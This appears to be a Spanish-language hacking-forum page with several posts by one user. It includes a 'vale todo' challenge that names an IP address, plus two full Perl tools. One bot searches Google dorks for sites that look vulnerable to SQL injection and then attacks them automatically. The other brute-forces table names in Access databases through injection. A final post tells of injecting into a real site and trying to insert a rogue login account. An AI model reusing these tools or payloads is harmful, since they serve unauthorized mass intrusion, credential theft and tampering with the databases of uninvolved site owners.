Temas

[Vale todo!!!]

Hola muchachos, gusto en saludarlos al foro! Les dejo un desafió para las noches de aburrimiento y cervezas ensima. Vale todo!!!



https://170.210.156.26.

Espero se diviertan.

Saludos

[inurl:noticias.php?id= site:com.ar]

Bueno gente aca les dejo un BOT que que lo codee hace un tiempito atras. El que publico, está en la version 2.0.
Lo que hace el BOT es buscar en google con un patron de busqueda y luego testear si la pagina es posiblemente inyectable a SQL., en el caso de que lo sea lo guarda para despues intentar inyectar por si solo. Todo lo almacena en un archivo que nosotros le pasamos como parametro su nombre. Un Ejemplo de uso:

         

+++++++++++++++++++++++++++++++++++++
               +     Bot MySQL Search Google 2.0   +
               +         By MagnoBalt              +
               +++++++++++++++++++++++++++++++++++++

[?]Ingrese Patron de Busqueda (ej: inurl:.php?id_noticia=: >> inurl:noticias.php?id= site:com.ar
[?]Total de paginas de busquedas en Google: >> 10                                              
[?]Nombre de archivo donde guardar todo: >>argetinas.txt                                        

• Search:

Fijense los parametros. el primero es el patron de busqueda inurl:noticias.php?id= site:com.ar
, el segundo es la cantidad de paginas para google 10, y en el tercer es el nombre del archivo donde almacenara todo para despues revisarlo con mayor tranquilidad argetinas.txt  

El ataque de la inyeccion se divide en estos pasos.+
1. Obviamente sacar la cantidad de columnas mediante la clausula UNION con una cota superior de 50. (eso lo pueden modificar en el codigo si quieren aun mas)
2. Verificar disponibilidad de Information_schema
3. Verificar disponibilidad de Mysq.Users
4. Verificar si el usuario de la base de datos es r00t.

Tengo pensado seguir agregandole mas cosas como busquedas atraves del BING y testeo de otras posibles formas de inyecciones. Si alguien tiene alguna sugerencia, critica, comentario, codigo lo que sea con mucho gusto sera recibido..

Aqui va el codigo.

Código (perl) [Seleccionar] Expandir


#Bot MySql Search Google v 2.0
#Coded by Magnobalt
#contact Msn: magnobalt@gmail.com
#thanks www-Insecurity.cl && www.undersecurity.net

#!/usr/bin/perl
       use LWP::Simple;
       use LWP::UserAgent;
       use HTTP::Request;

my $sis="$^O";if ($sis eq 'MSWin32') { system("cls"); } else { system("clear"); } #que sistema operativo es
       print "\t\t+++++++++++++++++++++++++++++++++++++\n";
       print "\t\t+     Bot MySQL Search Google 2.0   +\n";
       print "\t\t+         By MagnoBalt              +\n";
   print "\t\t+++++++++++++++++++++++++++++++++++++\n\n";
       print "[?]Ingrese Patron de Busqueda (ej: inurl:.php?id_noticia=: >> ";
       $dork.=<STDIN>;
chomp($dork);
print "[?]Total de paginas de busquedas en Google: >> ";
       $paginas.=<STDIN> ;
chomp($paginas);
print "[?]Nombre de archivo donde guardar todo: >>";
$archivo.=<STDIN>;
chomp($archivo);
       open (AR,">>".$archivo) || die "No puede crear el archivo error: $!";
print "\n[+]Search:\n\n";
print AR "++++++++++++++++++++++++++++++++++++\n";
       print AR "+     Bot MySQL Search Google V2.0 +\n";
       print AR "+         By MagnoBalt             +\n";
print AR "++++++++++++++++++++++++++++++++++++\n\n";
print AR "Patron De Busqueda en Google: $dork y paginas utilizadas: $paginas\n";
print AR "\n[+]Search:\n\n";
#-----------------------------------------------------------------------------------------------------
#Buscando en google vulnerabilidades
       for($i = 0;$i <= $paginas*10;$i += 10)
       {      
       $busqueda = "http://www.google.com/search?hl=en&q=".$dork."&btnG=Search&start=".$i;
   $ua = LWP::UserAgent->new(agent => 'Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12');
           $ua->timeout(7);
           #$ua->env_proxy;
           $response = $ua->get($busqueda);
   $source= $response->content;
           while ($source =~ m/<h3 class=.*?<a href="([^"]+).*?>(.*?)<\/a>/g) {
    $ban=0;    
    my $enlace = $1;
    $testing=$enlace."\'";
    $ua= LWP::UserAgent->new(agent => 'Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12');
    $ua->timeout(10);
    $response = $ua->get($testing);
    $error=$response->content;
if($error=~ /mysql_fetch_/ || $error=~ /You have an error in your SQL syntax/ || $error =~ /tem um erro de sintaxe no seu SQL/ || $error =~ /mysql_num_rows/ || $error =~ /Division by zero in/) {
#-----------------------------------------------------------------------------------------------------
# Verifico si existe la url en entre las victimas para no redundar
 foreach $exist(@victims){
   my($url)=$exist=~m/(http:\/\/[\w+\.]+\/)/;
   my($url2)=$enlace=~m/(http:\/\/[\w+\.]+\/)/;
     if ($url eq $url2){
$ban=1;
}
}#cierre foreach
     if ($ban == 0){
push(@victims,$enlace);
   }
#-----------------------------------------------------------------------------------------------------
 }
   }
}#fin del for

if (@victims){ #verifico si no esta vacio el arrays
 print "\n[+]Estas son las  posibles victimas:\n";
 for($i=0;$i<=$#victims;$i++){
 print "[$i]$victims[$i]\n";
 print AR "[$i]$victims[$i]\n";
     }  
}else {
 print "[-]No se encontraron Victimas, realiza otra busqueda o verifica si Google no la bloqueo\n";
 print AR "[-]No se encontraron Victimas, realiza otra busqueda o verifica si Google no la bloqueo\n";
 exit(0);
}
#-----------------------------------------------------------------------------------------------------
# Empezando la automatizacion del bot
#-----------------------------------------------------------------------------------------------------
print"\n\n[+]Empezando la automatizacion del BOT\n";
print AR "\n\n[+]Empezando la automatizacion del BOT\n";
for($ii=0;$ii<=$#victims;$ii++){
$ban2=0;
$victima=$victims[$ii];
print "\n[+] Inyectando a: $victima\n";
$cfin ="--" ;
$cmn="+";
#$victims[$opc]=$victims[$opc]." *";# Coloco al final el Asterisco
$victima=~s/[a-zA-Z0-9_\*\s]+$//g;;#dejo en blanco el ultimo parametro ($) para poder inyectar, inclusive los valores * y espacion en blanco con \s
misma_victima:
if ($ban2 == 1) {
   $cfin ="/*" ;
   $cmn="/**/";
}
 #-----------------------------------------------------------------------------------------------------
#busqueda de Columnas
$column=50;
for ($col=0; $col <=$column;$col++){
    $union.=','."0x6d61676e6f62616c74";
    $numero.=','.$col;
     if ($col ==0){
     $union='';
     $numero='';
     }
    $out=$victima."-1".$cmn."UNION".$cmn."SELECT".$cmn."0x6d61676e6f62616c74".$union.$cfin;
    $ua= LWP::UserAgent->new(agent => 'Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12');
    $ua->timeout(10);
    $response = $ua->get($out);
    $verifica=$response->content;
            if ($verifica =~/magnobalt/) {
$col++;
print "\n[+]La web posee $col";
print "\n[+]".$victima."-1".$cmn."UNION".$cmn."SELECT".$cmn."0".$numero.$cfin."\n\n";
print AR "[SITIO]\n";
print AR "$victima\n";
print AR "[+]La web posee $col\n";
print AR "[+]".$victima."-1".$cmn."UNION".$cmn."SELECT".$cmn."0".$numero.$cfin."\n\n";
#-----------------------------------------------------------------------------------------------------
#buscando Information_schema
print AR "[Information_Schema]\n";
$out=$victima."-1".$cmn."UNION".$cmn."SELECT".$cmn."0x6d61676e6f62616c74".$union.$cmn."FROM".$cmn."information_schema.tables".$cfin;#busco information schema.
$ua= LWP::UserAgent->new(agent => 'Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12');
$ua->timeout(10);
$response = $ua->get($out);
$verifica=$response->content;
if ($verifica =~/magnobalt/){
    print AR "[+]Information Schema Disponible\n\n";
    }else {
    print AR "[-]Information_Schema no Disponible\n\n";
     }
#-----------------------------------------------------------------------------------------------------
#buscando Mysql.users
print AR "[Mysql.users]\n";
$out=$victima."-1".$cmn."UNION".$cmn."SELECT".$cmn."0x6d61676e6f62616c74".$union.$cmn."FROM".$cmn."Mysql.users".$cfin;
$ua= LWP::UserAgent->new(agent => 'Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12');
$ua->timeout(10);
$response = $ua->get($out);
$verifica=$response->content;
if ($verifica =~/magnobalt/){
    print AR "[+]Mysql.users Disponible\n\n";
    }else {
    print AR "[-]Mysql.users no Disponible\n\n";
     }
                #-----------------------------------------------------------------------------------------------------
#verficando si esta corriendo como root
print AR "[Usuario RooT]\n";
while($j < $col-1){
   $root.=','."concat(0x6d61676e6f62616c74,user())";
   $j++;
 }
$out=$victima."-1".$cmn."UNION".$cmn."SELECT".$cmn."concat(0x6d61676e6f62616c74,user())".$root.$cfin;
$ua= LWP::UserAgent->new(agent => 'Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12');
$ua->timeout(10);
$response = $ua->get($out);
$verifica=$response->content;
if ($verifica=~/magnobaltroot@/){
    print AR "[+]El usuario es root\n\n";
    }else {
    print AR "[-]El usuario no es root\n\n";
     }
push(@victims_on,$victima);
$col=80;#fuerzo salida del for de columnas
   
    }
}#cierre for de columnas
 if ($ban2 == 0 && $col == 51){
           $ban2=1;  
     goto misma_victima;
     }
 if ($cfin eq "/*" && $col == 51){
     push(@victims_off,$victima);
   }
 
}#cierre for principal

#------------------------------------------------------------------------------------------------------------
#imprimimos la que tuvieron exitos y las que no

print AR "[+]Paginas inyectadas exitosamente\n\n";
for($i=0;$i<=$#victims_on;$i++){
 print AR "[$i]$victims_on[$i]\n";
     }  
print "\n\n";
print AR "\n[-]Estas paginas no se pudieron automatizar intentelas a mano :)\n\n";
for($i=0;$i<=$#victims_off;$i++){
  print AR "[$i]$victims_off[$i]\n";
     }  


Saludos a Todos...

[socket]

Hola estoy teniendo un problema en perl. Estoy haciendo script  y para practicar socket decidi hacer una tool que inyecte codigo SQL a un motor de ACCESS. Ahora la cuestion es que no se como hacer para que cuando realizo el SOCKET con una pagina "A" (la cual es la vulnerable a inyecciones), ese mismo socket me sirva para realizar todas las inyecciones que nesesite. Sin volver a crear el objeto nuevamente.  
Este es mi script. Si se fijan en cada inyeccion creo un nuevo socket llamando a la funcion socket,y le paso como parametro el GET de la pagina q deseo obtener (que vendria hacer la inyeccion q mando por URL)
Creo q esto esta mal.. alguien me podria ayudar..
Como seria crear una sola vez el Socket y luego usar Los GET que quisiera

Código (perl) [Seleccionar] Expandir

#!/usr/bin/perl
use IO::Socket;
@nombretabla=('admin','tblUsers','usuarios','tblAdmin','user','users','username','usernames','usuario',
 'name','names','nombre','nombres','member','members','admin_table',
 'miembro','miembros','membername','admins','administrator','accesos',
 'administrators','passwd','password','passwords','pass','Pass',
 'tAdmin','tadmin','user_password','user_passwords','user_name','user_names',
 'member_password','mods','mod','moderators','moderator','user_email',
 'user_emails','user_mail','user_mails','mail','emails','email','address',
 'e-mail','emailaddress','correo','correos','phpbb_users','log','logins',
 'login','registers','register','usr','usrs','ps','pw','un','u_name','u_pass',
 'tpassword','tPassword','u_password','nick','nicks','manager','managers','administrador',
 'tUser','tUsers','administradores','clave','login_id','pwd','pas','sistema_id',
 'sistema_usuario','sistema_password','contraseña','auth','key','senha',
 'tb_admin','tb_administrator','tb_login','tb_logon','tb_members_tb_member',
     'tb_users','tb_user','tb_sys','sys','fazerlogon','logon','fazer','authorization',
     'membros','utilizadores','staff','nuke_authors','accounts','account','accnts',
     'associated','accnt','customers','customer','membres','administrateur','utilisateur',
     'tuser','tusers','utilisateurs','password','amministratore','god','God','authors',
     'asociado','asociados','autores','membername','autor','autores','Users','Admin','Members',
 'Miembros','Usuario','Usuarios','ADMIN','USERS','USER','MEMBER','MEMBERS','USUARIO','USUARIOS','MIEMBROS','MIEMBRO');
sub socket{
   my $inyec= shift;
$socket = new IO::Socket::INET(
PeerAddr => $host,
PeerPort => 'http(80)',
Proto => 'tcp') || die "[-] No se ha podido conectar a $host";
print $socket "GET " .$path.$inyec.$tabla. " HTTP/1.0\r\n";
print $socket "HOST:$host\r\n";
print $socket "\n\n";
return $socket;
 }

if (!@ARGV[1]) {
     print "======================================================= \n";
     print " Injection AIS V 1.0 beta by MagnoBalt \n\n";
     print " use perl $0 www.pagina.com.ar /noticia.php?id=\n\n";
 print " AIS:Acces Injection SQL \n";
     print "======================================================= \n";
     exit(0);
     }
$host =@ARGV[0];
$path=@ARGV[1];
print "\n[-]Buscando Tablas \n";
$iny="-1+UNION+SELECT+0+FROM+";
#print "antes de la funcion valor $iny\n";
foreach $tabla(@nombretabla) {
 chomp($tabla);  
 #empuezo a guardar linea por linea el source en $response
 $socket=&socket($iny);
 while (<$socket>) {$response .= "$_ "}
 if($response=~/The number of columns in the two selected tables or queries of a union query do not match/ || $response=~/ero de columnas de las dos tablas o consultas seleccionadas para una consulta de uni&#243;n no coincide/)
{
print "[+]Tabla $tabla FOUND\n";
$tabla_aux=$tabla;
   }
#print $response;
$response="";#limpio la variable
}#cierrre foreach
$inyc="";
#buscamos numeros de columnas
print "[-]Buscando columnas\n";
print "[-]Ingrese Maximo con cual intentar \n";
$col.=<STDIN>;
chomp($col);
print "[-]Buscando..\n";
$columna=1;
while ($columna <= $col) {
$union.=','.$columna;
$iny="-1+UNION+SELECT+0".$union."+FROM+".$tabla_aux;
$socket=&socket($iny);
while (<$socket>) { $response .= "$_ "}
#print $response;
if ($response=~/The number of columns in the two selected tables or queries of a union query do not match/ || $response=~/ero de columnas de las dos tablas o consultas seleccionadas para una consulta de uni&#243;n no coincide/)
{
print "[!] Fallo intento columna $columna\n";
}
else {
$columna++;
print "[+]La Web Posee $columna columnas\n ";
$columna = $col;#fuerzo la salida del while.
}
$response="";#limpio la variable
$columna++;
}



close $socket;
exit(0);





[dbo.tblUser.User_ID dbo.tblUser.User_Code dbo.tblUser.User_Passworddbo.tblUser.User_Permissions dbo.tblUser.User_Number dbo.tblUser.User_Firstnamedbo.tblUser.User_Surnamedbo.tblUser.User_TitleBeforedbo.tblUser.User_TitleAfter . .]

Hola que tal como va!! Encontre un pagina donde pude hacerles una inyecciones de SQL y me dio el nombre de la tabla mas Todas las culomnas..  les muestro algunas

dbo.tblUser.User_ID
dbo.tblUser.User_Code
dbo.tblUser.User_Password
dbo.tblUser.User_Permissions
dbo.tblUser.User_Number
dbo.tblUser.User_Firstname
dbo.tblUser.User_Surname
dbo.tblUser.User_TitleBefore
dbo.tblUser.User_TitleAfter
                  .
                  .
Ahora cuando llego a tratar de sacarle la version por ejemplo con esto:
'union select @@version ,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --
Me tira este error...

Error: ERROR [42000] [Microsoft][ODBC SQL Server Driver][SQL Server]Error converting data type nvarchar to bigint.

Cuando me tendrai q dar algo asi..

Error Type:
Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)
[Microsoft][ODBC SQL Server Driver][SQL Server]Conversion failed when converting the nvarchar value 'Microsoft SQL Server 2005 - 9.00.2221.00 (Intel X86) Feb 9 2007 17:30:38 Copyright (c) 1988-2005 Microsoft Corporation Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 1) ' to data type int.

Lo mismo pasa si pongo por ejemplo
'union select @@servername ,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --
No se a lo qiue se refiere con ese error...
Despues tambien como tengo las columnas intente agregar un registro con nombre de usuario y pass.. para loguearme puse
';INSERT INTO dbo.tblUser (User_Code, User_password) VALUES ('magnobalt', 'magno') --
Y obtengo este error:

error: ERROR [23000] [Microsoft][ODBC SQL Server Driver][SQL Server]Violation of UNIQUE KEY constraint 'IX_tblUser'. Cannot insert duplicate key in object 'dbo.tblUser'. ERROR [01000] [Microsoft][ODBC SQL Server Driver][SQL Server]The statement has been terminated.

Entiendo Como si estoy queriendo ingresar un dato duplicado en la clave primaria... Pero Intente con numeros altos al lado de mi user y me sigue arrojando el mismo error...Pero creo q la columna user no creo q sea la clave primaria...alguna ayuda!!
Un abrazo
Si alguien me puede dar una mano!! Gracias